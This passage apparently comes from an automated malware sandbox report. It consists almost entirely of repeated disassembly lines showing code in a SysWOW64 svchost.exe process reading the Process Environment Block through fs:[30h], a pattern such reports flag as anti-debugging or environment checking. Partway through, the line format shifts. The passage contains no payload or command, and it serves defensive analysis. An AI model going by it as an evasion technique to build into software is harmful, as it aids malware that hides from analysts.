            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
